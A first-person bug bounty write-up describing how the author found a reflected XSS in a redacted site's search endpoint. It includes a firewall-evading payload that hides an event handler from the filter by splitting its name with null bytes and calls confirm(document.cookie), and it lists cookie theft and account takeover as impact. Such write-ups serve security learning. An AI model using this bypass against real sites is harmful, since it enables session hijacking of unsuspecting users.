Introduction

Every bug hunter remembers their first triaged report โ€” and this is mine.

After months of learning web security, testing applications, and submitting reports that didn't always go anywhere, I finally got my first vulnerability triaged. It wasn't about the bounty โ€” it was about validation and progress.

In this post, I'll walk through how I discovered a Reflected Cross-Site Scripting (XSS) vulnerability in a web application (target redacted), how I confirmed impact, and what I learned from the process.

๐Ÿ” Discovery

While exploring the application, I noticed a search feature used to look up articles.

Search endpoints are always interesting, so I began testing how user input was handled. Basic reflection checks showed that my input was being returned in the response โ€” a classic sign that XSS might be possible.

That's when I decided to try a more advanced payload.

๐Ÿงช Exploitation

When I tried to inject a simple payload like <img src=x onerror=confirm(1)> it doesn't work because the firewall detects this is a malicous action and give you a 403 response so i tried many injection but nothing works then i started analyzing and after a while i noticed that if you type any Javascript event handler and write the assign mark ,for example"onerror=", the firewall detects that and you will be blocked so an idea hit my mind that why not trying the null byte injection here so i crafted a payload

</strong></p></section>"<img src =x one%00rror=conf%00irm(document.cookie)">"

I was able to break out of the existing HTML context and inject an image tag with an obfuscated event handler.

Because this was reflected, the attack would require social engineering (sending a crafted link to a victim), but the impact was still serious.

๐Ÿ’ฅ Impact

Successful exploitation allows an attacker to:

  • Steal session cookies
  • Perform actions as the victim
  • Redirect users to malicious pages
  • Potentially lead to account takeover
  • Run arbitrary JavaScript in users' browsers

Any authenticated user who clicked a malicious link could be compromised.

Thank you all for reading and for your time โค I wish you had some fun with me and liked this write-up inshallah โค

as soon as I get smth interesting to write about, I am gonna share it :D

Have fun and keep digging โค